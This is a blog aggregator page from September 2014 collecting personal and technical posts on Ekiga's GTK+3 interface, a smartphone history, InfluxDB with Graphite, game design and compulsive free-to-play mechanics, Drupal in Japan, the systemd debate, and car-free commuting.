GNOME 3 and HIG Love

I am making progress on the next Ekiga release. I have spent the last few months of spare time working on the user interface. The purpose is to adapt the UI and use the great GTK+3 features when adequate. There is still much left to do, but here are before and after screenshots. Stay tuned […]

by Damien Sandras at September 27, 2014 04:56 PM

September 25, 2014

Frank Goossens

Music from Our Tube; Benjamin Booker’s Violent Shiver

“Violent Shiver” was Benjamin Booker’s very first single. And it’s an impressive one, as far as one-song-debuts go. This is a live version recorded for WFUV.

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at September 25, 2014 11:09 PM

September 24, 2014

Frank Goossens

The Broken Smartphone Breakdown

broken smartphone (http://pixabay.com/en/broken-cell-phone-cellular-72161/)I’m a spoiled, clumsy brat. Spoiled because my (previous) employer hands out yearly vouchers, which I use to buy me a new top-notch smartphone every 2-3 years. And clumsy as I all too often loose of break those expensive gadgets, forcing me to look for cheaper replacements. So here’s the breakdown of my smartphone history;

  1. 2009: HTC Hero: my first smartphone (although I wasn’t complaining about that 2nd hand Nokia e61i). I lost it on the train a year and a half after buying it
  2. 2011: Acer beTouch e110: cheap replacement for the HTC Hero, only used it for a couple of weeks before selling it because it was a horrible excuse of a smartphone.
  3. 2011: HTC Magic: 2nd hand replacement, it was a great little handset once it was flashed with Cyanogenmod. I sold it for my next new phone, the …
  4. 2011: Samsung Galaxy SII: Had a great time with that Sammy, lots of upgrades & tweaks. but I did need to have it repaired within a year of buying it, after it fell out of my pocket when getting off the train.
  5. 2012: Samsung Omnia 7: My first encounter with the Windows Phone Metro interface as a temporary device, while the SII was getting fixed.
  6. 2012: Samsung Galaxy SII: back from repairs and was very happy with it, but a year after that it broke down again.
  7. 2013: HTC Radar: temporary replacement for the SII, Windows Phone again.
  8. 2013: Samsung Galaxy S4: A brand new handset which I dropped approx. a year after buying it. Not really a huge leap forward compared to the SII, but I did love the speed improvements 4G offered.
  9. 2014: Samsung Galaxy Gio: temporary replacement for the broken S4. but despite the fact I got my main apps up and running (incl. Firefox Mobile), the old version of Android (2.3.6), the small screen and a serious lack of memory decided this was not a permanent replacement.
  10. 2014: Google Galaxy Nexus; 2nd hand replacement (bought yesterday, a steal for only €95) with Cyanogenmod 11. Early days, but I just might try not to drop it, I’m loving it already. The only thing I really miss is 4G support, because, after all, I am a spoiled brat.

by frank at September 24, 2014 03:07 PM

Dieter Plaetinck

InfluxDB as a graphite backend, part 2



Updated oct 1, 2014 with a new Disk space efficiency section which fixes some mistakes and adds more clarity.

The Graphite + InfluxDB series continues.

  • In part 1, "On Graphite, Whisper and InfluxDB" I described the problems of Graphite's whisper and ceres, why I disagree with common graphite clustering advice as being the right path forward, what a great timeseries storage system would mean to me, why InfluxDB - despite being the youngest project - is my main interest right now, and introduced my approach for combining both and leveraging their respective strengths: InfluxDB as an ingestion and storage backend (and at some point, realtime processing and pub-sub) and graphite for its renown data processing-on-retrieval functionality. Furthermore, I introduced some tooling: carbon-relay-ng to easily route streams of carbon data (metrics datapoints) to storage backends, allowing me to send production data to Carbon+whisper as well as InfluxDB in parallel, graphite-api, the simpler Graphite API server, with graphite-influxdb to fetch data from InfluxDB.
  • Not Graphite related, but I wrote influx-cli which I introduced here. It allows to easily interface with InfluxDB and measure the duration of operations, which will become useful for this article.
  • In the Graphite & Influxdb intermezzo I shared a script to import whisper data into InfluxDB and noted some write performance issues I was seeing, but the better part of the article described the various improvements done to carbon-relay-ng, which is becoming an increasingly versatile and useful tool.
  • In part 2, which you are reading now, I'm going to describe recent progress, share more info about my setup, testing results, state of affairs, and ideas for future work

read more

September 24, 2014 11:56 AM

September 21, 2014

Steven Wittens

The Cargo Cult of Game Mechanics

Form without Function

There's been a lot of fuss about gaming and gaming culture lately, in particular the nature of gaming journalism. Don't worry, I'm so not sticking my face into that particular beehive. However, I do agree the conversation around gaming is crap, so instead I'm posting the kind of opinion piece I wish I'd see on credible gaming sites, as someone who actually knows how the sausage is made.

Dear Esther

But is it Art?

Gamers like to talk—or argue—about graphics, frame rates, physics, hours of play time, item variety, models, textures, downloadable content and microtransactions, and so on. There is a reason the Glorious PC Master Race and the Console Wars are memes. If games are art, if it's a grown up medium, why do we fuss about trivialities so much? You don't debate high literature by critiquing the paper stock or chapter length.

Well because production values are important for immersion. Details and performance really matter. However when we treat games just as mechanical live pictures, we're missing the point entirely. It's confusing form with function. In The Dark Knight, Heath Ledger's Joker should look the part, but he'll be 10x scarier and more interesting once you understand how he operates and thinks. This seems obvious in film, yet not in gaming.

Even "artistic games" like Dear Esther are often criticized for superficial mechanics (or lack thereof), not for what they set out to do. The question isn't whether Dear Esther is just a walking simulator. It's whether it's anywhere near as engaging as walking around a real place, like a park or a museum. If it fails, it's not because there aren't any puzzles. The Anne Frank House in Amsterdam does not require puzzles. It does have a secret passage but the only achievement you get for finding it is sadness.

Yup, that awkward pause is where the "gaming as a serious medium" debate usually hangs, and it leaves the conversation severely deadlocked. Trying to add gamified elements for the heck of it, to make a gamier game, rings hollow and does not get us any closer to credibility.

Heavy Rain

The popular alternative is to simply adopt the current forms of Serious Media. To make a game more like a movie or a book, whether blockbuster or arthouse. It generally involves taking away choice, using scripts instead of simulations, with mini-games and quick-time events thrown in to amuse your hindbrain. It's tacitly saying that real storytelling, real human comedy or tragedy, can't happen while a player is in control. It's non-sense of course, plenty of games have done so before.

Somehow though we've forgotten how to do it, and I don't think I'm alone in thinking this. This existential crisis was perfectly embodied in indie gem The Stanley Parable, a post-modern tale of choice. It's a game about playing a game, constantly breaking the fourth wall. There's recursive gags, self-parodying achievements, 'victory' conditions that require you to quit the game, and other surgical strikes at typical gaming habits. It garnered critical praise from gamers and journalists alike, playing like a love-hate letter to its audience: at times cooperative and happy, other times sardonic and sadistic.

The Stanley Parable

I'm pretty sure The Stanley Parable is Art. There's just one thing bothering me. It doesn't actually offer you any choice. The game is an admission of defeat.

Choice is of course a tricky concept, that was the whole point, so let me be more specific. You could feasibly make a 100% Let's Play of Stanley Parable, covering all the branching paths, and turn it into a sort of Dragon's Lair on Laserdisc. It would lose little in translation, most of the gags would still work. It's not a game about your choices, it's still just about watching theirs.

Live in Your World, Play in Ours

If you're looking for someone to blame (you know, in general), it's easy to point to the incestuous industry. Games are big business and cost a ton to produce. The primary purpose of talking about games is to sell things to gamers, in a market that moves very fast, saturated with product. Hence brands and franchises compete over the attention of customers, preferably through lock-in. It goes beyond ordinary sales, and includes pre-orders, season passes, virtual marketplaces and other monetary aids. Be sure to use a condom.

For several years now though, there has been a counterpoint: the wave of DRM-free indies, Humble Bundles and the wild success of Kickstarter. Notably, industry veterans Tim Schafer and Brian Fargo, known for beloved classics like Monkey Island and Wasteland, each held out their hats and promised to bring back the glory days of old. Gamers rewarded them in spades. Budgets ballooned from a few hundred thousand to several million, spawning further spinoffs. Chris Roberts of Wing Commander fame did even better. He kickstarted Star Citizen to the tune of a few million, but continues to raise funds today with virtual goods and perks for the future game. It now exceeds $50 million in backer funding.

Typical game ad

If I were cynical, which I am, I would say a bunch of people have spent hundreds of dollars each on virtual assets with no guarantee they'll ever work as promised. This is the power of nostalgia mixed with in-engine mockups, and it's clearly very good business. Don't get me wrong, I've funded a few games on Kickstarter too, below retail. But what comes out of these projects is raising some eyebrows, with hype, delays and cancellations galore. I think it points to a deeper issue altogether, driven by games but not limited to gaming.

On the surface these developers are giving their fans exactly what they want. Something they already love, modernized and expanded, with early access and feedback. You cannot fault the creators for this. Rather, I think the problem is that gaming fans don't know what they want. It's a know it when I see it kind of affair. So they just ask for more of the same instead, again confusing form with function.

There's an elephant in the room. Everybody does it to some degree, but it's somehow shameful.

Compulsion.

It's even more obvious when you consider that the easy money in gaming isn't actually to bankroll a $200 million console blockbuster, half of which is probably marketing. Rather, it's to put a carefully tuned slot machine under the noses of as many people as possible, like say, a free-to-play smartphone game. With lots of push notifications and time locks, using fictional hooks to create personal investment and a sense of false scarcity. People pull their phones out in elevators and on the toilet, multiple times a day. It's guaranteed brain share if you get in, so much easier than convincing everyone to fork out $50 once, let alone monthly.

The real target audience is a small minority of whales—compulsive users—to buy the virtual currency and goods you mint at will. They subsidize the free users, who in turn provide word of mouth on social media. It's gambling and addiction, by any other name, only now people are betting real money against fake money, so it's legal.

Free to play

Most gamers are familiar with the "one more turn" itch of strategy or puzzle games, the desire to open every chest and read every log, the zombiefied stares at LAN parties. It's a common trope to be obsessive, but gamers are generally self-aware about it. We don't mind wasting time if it's fun, that's the point, and it gives the Youtubers something to do.

But the Skinner box is still real. Too often we see products that seem to consist mainly of compulsive triggers. Where the developers built a guided theme park ride with only the promise of cake at the end. They set out a generic progression tree and loom a nebulous threat overhead that can only be beaten by a fully armed and operational Level 80 Battlemage. Between you and the end stand a thousand foes and a bunch of fetch/build/shoot/escort quests. Everything will be perfectly scaled to offer the permanent illusion of a challenge you can barely win, and are constantly forced to work for.

I think this kind of game design stems from a fundamental misunderstanding, willful or not, of how games are supposed to work. It's cargo culting the patterns of games and game mechanics, without considering what they're for. Which is the point I'd like to get to.

But first, there's still the elephant.

Crowdfunding
Double Fine Adventure Kickstarter

See, the way these shady free-to-play games work... if we're honest, it kinda matches how Kickstarter plays out. Dramatic concept art. A beloved NPC in need. An XP bar to fill. Stretch goals to level up. Massive online multiplayer with social media tie ins, rally your friends. Plus of course, unlimited alpha and beta testing until release, bankrolled by you, with additional paid perks along the way.

With the risk of stating the obvious, but it's more on point than ever: these things are run by game designers, for gamers. No, put away the tin foil hat. I simply want to suggest that what draws people into these projects bears little relation to what comes out at the end, a release which is merely a coda to a multi-year event. That it is no more about game development than Mario is about saving princesses. That maybe Kickstarter is a sequel to Twitter, the world's #1 video game.

It shows in the lack of polish and sophistication in the games that do manage a release, which reviewers and fans consistently gloss over or forgive. Yes I'm getting into taste territory here, but let's look at it objectively. Repetitive shoot em ups that merely consist of dice rolls and numbers going up. RPGs with fenced off wax-museum towns. Meticulously painted backdrops that belie the lack of depth. Or alternatively, pixel art and chiptunes.

Indies

On the surface these games have all the trappings of the classic gaming age, remade in widescreen HD or quirky indie glory, but they lack lasting power once you stop playing. Far from evolving the real classics, of which there are admittedly not actually that many, we've regressed and turned them into caricatures of themselves, mistaking technical limitations for a lack of ambition.

The Carrot and the Stick

If at this point you think I'm wearing rose-tinted glasses so fabulous I'm farting rainbows, allow me to convince you otherwise. I'm not pretending that classic DOS or NES games with giant clunky controls were the height of interaction design, or that early 3D wasn't butt-ugly in retrospect. Features like hint systems and autosaves are nice. Rather, there's a reason people continue to cite the same few classics.

Fallout, Freespace, Outcast, Master of Orion, Rollercoaster Tycoon, System Shock, Thief and Torment are still high points in gaming, and it isn't because they were/weren't Art, or are/aren't crappy by modern standards.

To this day, each of those games presents an understandable, flexible sandbox. They offer you a world with consistent rules, letting you figure out the mechanics to face the game's challenges your way. You explore environments at your own pace, build at your leisure, and you're driven forward because you want to, not because you have to. Compulsion is a side-effect of existing motivations, which naturally result from actively participating in the game world.

Classics

If I go through an airlock in System Shock 2, it's because I need what's on the other side of it, and I hope to return alive from it. The game presents a choice and then dares me to take it.

If I go through an airlock in Mass Effect 3, it closes permanently because everything looks the same and too many players got turned around in testing. There is never a reason to go back. The game presents a mistaken illusion of freedom and has to clamp down to fix it.

Corridor shooters with random chest high barriers, indestructible plot armor, keys hanging next to locks, breadcrumbed objective markers, one-way quick travel or chutes, rock-paper-scissors busywork, teleporting AI... these are all just symptoms of a broken game world, which needs dramatic patch jobs to make basic gameplay not fall apart. If a level designer locks a door with the Red Key, they're just putting a meaningless fetch quest in your path to keep you busy. If they put two elite guards and an alarm there instead, now you have the opportunity for improvisation and consequence. That can only happen when there's options beyond "Use Shotgun on Face" and you've been given space and time to get confident about it.

Instead, many games are explicitly structured in a linear, inflationary manner. What you do at level 50 is mostly the same as level 5, only now the numbers are 10× larger, and you shoot blue instead of green.

Classics

The role of game mechanics should not be the oppressive tyrant telling you to fetch and grind and be thankful for your crumbs of XP and DPS as the scenery blazes past. It should be an à-la-carte menu of options which is opened up for your benefit and at your direction. Slow enough that you can get familiar with each element in turn, but fast enough not to frustrate and limit. Unlockables and crafting should be a way to enable new abilities, not just busywork. Level ups should let you specialize in certain tactics, not just keep up with the Joneses who all bought new glass armor and plasma rifles overnight. Compulsion is just a stick, not the carrot.

Ironically I think it's the technical limitations of classic games that often played to their advantage and which modern remakes in particular are screwing up. The spartan graphics served to highlight the mechanics, instead of needing focus rings and prompts. The lack of voices and mocap forced the writing to carry the story. When you can't conjure up massive vistas at will, there's no point in making the player cross giant cities and wastelands. When the entire world is just isometric sprites, it's practical to let the player destroy all of them. For a while there was a really good match between the complexity of the game world and the way it was represented, and I don't think it's a coincidence that this window is where we find many beloved gaming classics.

What might now seem like broken mechanics often had significant effects on gameplay. An amnesiac guard that can't climb ladders has a similar effect as regenerating health: it makes it easier to run away. Except only one of those requires the player to learn their surroundings. Circle strafers had a surprising amount of non-linearity and involved much more acrobatics than FPSes today, and the passive AI of early RTSes acts similar to modern shooter enemies, which don't engage unless you've spotted them.

Classic games

Gaming is ultimately about forgetting the rules of reality and adopting a whole new set. Realism doesn't matter, whacky rules can be fun, as long as they're consistent and interact in interesting ways.

For modern games to evolve to match their now deceiving superstar looks, to move beyond progress bar quest and animated puppets with voice boxes, significant advances have to be made. We need real sandbox simulation, autonomous agents and language-capable AI, and it's not as easy to deliver as another sequel or reboot, mainstream or otherwise. It requires building a game that's meant to be played rather than just reacted to.

I just hope enough people remember what actually made the classics work.

September 21, 2014 07:00 AM

September 20, 2014

Dieter Plaetinck

Graphite & Influxdb intermezzo: migrating old data and a more powerful carbon relay


read more

September 20, 2014 07:18 PM

Dries Buytaert

Reflections on Drupal in Japan

Topic: 
Location: 

I spent the last week in Japan. The goal was two-fold: meet with the Drupal community to understand how we can grow Drupal in Japan, and evaluate the business opportunity to incorporate an Acquia subsidiary in Japan (we already offer Acquia Cloud in Japan using Amazon's Tokyo data center).

I presented at two Drupal meetups in Japan; spent the week meeting with members of the Drupal community, Drupal agencies, large system integrators (IBM, Accenture, Hitachi, Fujitsu, Ci&T and SIOS) and the Japanese government. In between meetings, I enjoyed the amazing food that Japan has to offer.

The community in Japan is healthy; there are some noteworthy Japanese Drupal sites and there are passionate leaders that organize meetups and conferences. The Japanese Drupal community is bigger than the Chinese Drupal community but compared to North America and Europe, the Japanese Drupal community is relatively small; the largest Drupal agency I met with employs 20 developers.

The large system integrators, with the exception of Ci&T, have not done any Drupal projects in Japan. We're way behind our competitors like Sitecore, Adobe Experience Manager and SDL in this regard. All of them enabled the large system integrators to sell and use their products. It was great to meet with all the system integrators to make them aware of Drupal, and the potential it could have to their business. It's clear the large system integrators could benefit from an Open Source platform that allows them to move faster and integrate with more systems.

The biggest challenge is the lack of Japanese documentation; both marketing materials as well as developer documentation. Most of the Japanese do not have much confidence in their English speaking ability and struggle to use Drupal or to participate on drupal.org. My recommendation for the Japanese Drupal community is to organize regular translation sprints. Translating one or more of the best-selling English Drupal books to Japanese could also be a game-changer for the community.

Another problem has been the historic challenges with drupal.jp. The anonymous owner of the domain drupal.jp claims that drupal.jp is the official Drupal site in Japan (it's not officially approved) and runs it without much regard or consultation with the broader Japanese Drupal community. I promised the Japanese community to help fix this.

I returned from my trip feeling that the Japanese market offers a great opportunity for Drupal. Japan is the world's third-largest economy, after the United States and China. With continued leadership, Drupal could be huge in Japan. I’d love that, as I would like to go back and visit Japan again.

Japan

by Dries at September 20, 2014 06:46 PM

Kris Buytaert

On Systemd and devops

If it's not broken , don't fix it.
Those who don't understand Unix are doomed to reinvent it, poorly
Complexity is the enemy of reliability.

Are some of the more frequently heard arguments in the systemd discussion. Indeed I see and hear a lot of senior Linux people react openly and probably way to late against the introduction of systemd in a lot of our favorite Linux distributions.

To me this is a typical example of the devops gap. The gap between developers writing code and operations needing to manage that code on production platforms at scale.
Often developers writing code that they think is useful and relevant while they are not listening to their target audience , in this case not the end users of the systems but the people that are maintaining the platforms. The people that work on a daily base with these tools.

I have had numerous conversations with people in favor and against systemd, till today I have not found a single general purpose use case that could convince me of the relevance of this large change in our platforms. I've found edge cases where it might be relevant. but not mainstream ones. I've also seen much more people against it than in favor. I've invited speakers to conference to come and teach me. I've probably spoken to the wrong people,

But this is not supposed to be yet another systemd rant.. I want to tackle a bigger problem. The problem that this change and some others have been forced upon us by distributions that should be open, and listen to their users, apparently both Debian and Fedora/RHEL failed largely but somehow fail to listen to their respective communities. Yes we know that e.g Fedora is the development platform and acts as a preview of what might come up in RHEL and thus CentOS later , but not everything eventually ends up in RHEL. So it's not like we didn't have an 'acceptance' platform where we could play with the new technology. The main problem here is that we had no simple way to stop the pipeline, it really feels like that long ago Friday evening rush deploy. Not like a good conversation between developers and actual ops on the benefits and problems of implementing these changes. This feels like the developers of the distributions deciding what goes in from their own little silo and voting in 'private' committee.

It also feels like the ops people being to busy to react, "Someone else will respond to this change, it's trivial this change is wrong , someone else will block this for sure",

And the fact that indeed Operating System developers, like Fedora and Debian friends kinda live in their own silo. (specifically not listing CentOS here..)

So my bigger question is .. how do we prevent this from happening again.. how do we make sure that distributions actually listen to their core users and not just the distribution developers.

Rest assured, Systemd is not the only case with this problem .. there's plenty of cases where features that were used by people, sometimes even the something people considered the core feature of a project got changed or even got ripped out by the developers because they didn't realize they were being used, sometimes almost killing that Open Source project by accident.
And I don't want that to happen to some of my favourite open source projects ..

by Kris Buytaert at September 20, 2014 05:52 PM

September 19, 2014

Dieter Adriaenssens

How I got more relaxed by no longer commuting by car

Yesterday was car free day, at least in Belgium, and by a happy coincidence I came across an article that pointed out a correlation between mental well-being and the means of transportation when commuting to work. It turns out that not using a car, fe. going by bike, on foot or by public transport increases your mental health. The author wonders about the reason for this.

I'm not a psychologist, nor have I done scientific research to investigate this, but from my personal experience, I can think of a few reasons why not driving by car to commute is better for you.

A few years ago, I was commuting daily by car. Construction works were going on for a few months, so every morning I spent 20-30 minutes in a traffic jam (on top of the 30 minute drive it took me to get to work).
Those 20-30 minutes of waiting, driving slowly, accelerating and breaking again, more waiting, ... well, it annoyed me, and I guess a lot of other people don't like traffic jams either.

A few months later, I was told the contract of my company lease car was about to end and I would get a new one.
Then I started wondering if I really liked spending that much time in traffic jams every day, 50-60 minutes of doing nothing else but stare at the car in front of me. So I started looking for alternatives. It turned out there was a train station at walking distance from my office, and it would take me 50-60 minutes to get from home to work. No gain in travel time (and it would take me less time by car if there would be no traffic jam), but I would spend about 45 minutes in a train, not having to pay attention to the cars in front of me, not having the stress and boredom of waiting in a traffic jam. I could listen to some music, read a bit, take a nap, stare out the window enjoying the scenery passing by or having a chat with a fellow commuter.
So instead of spending about an hour getting annoyed and stressed, I could relax while the train driver got me to work and I could get some things done in the mean time.

So I declined the offer of a new lease car and decided to commute by train. I couldn't have made a better decision. From that moment on I arrived more relaxed at work and at home. Of course, commuting by train can be stressful as well : delayed or cancelled trains, crowded with noisy people. But I was lucky to have a quiet commuter train in the morning, and I could usually avoid rush-hour in the evening, so I usually had a comfortable commute, arriving at work or at home much more relaxed.

Commuting by train can be annoying as well, if you have to cope with long commutes, multiple stop-overs, delays and crowded trains on a daily basis, as I experienced a few years later on another job (but at least I could still doze off or read a bit).
But I was relieved, when I found a job closer to home that would take me 20 minutes by bike. No reading this time while commuting, but having the daily physical exercise and cruising past rows of waiting cars was enjoyable (I'm not gloating, actually, I took a route through the car free city center, so I didn't see that much cars on my way to work), but I knew that if I would go to work by car I would end up in a traffic jam and it would take me much longer to get to work.

I don't use the car that much anymore, only for longer drives, places that are hard to reach by public transport, or when transporting heavy or bulky loads. And I like it. I can't imagine losing multiple hours waiting in traffic jams every week.
Overall I'm more relaxed because I don't get annoyed waiting, can do some enjoyable things while commuting or get some physical exercise (which is also known to reduce stress levels).

A a consequence you have to make some compromises and it will take some extra planning, but it's worth it.

by Dieter Adriaenssens (noreply@blogger.com) at September 19, 2014 01:44 PM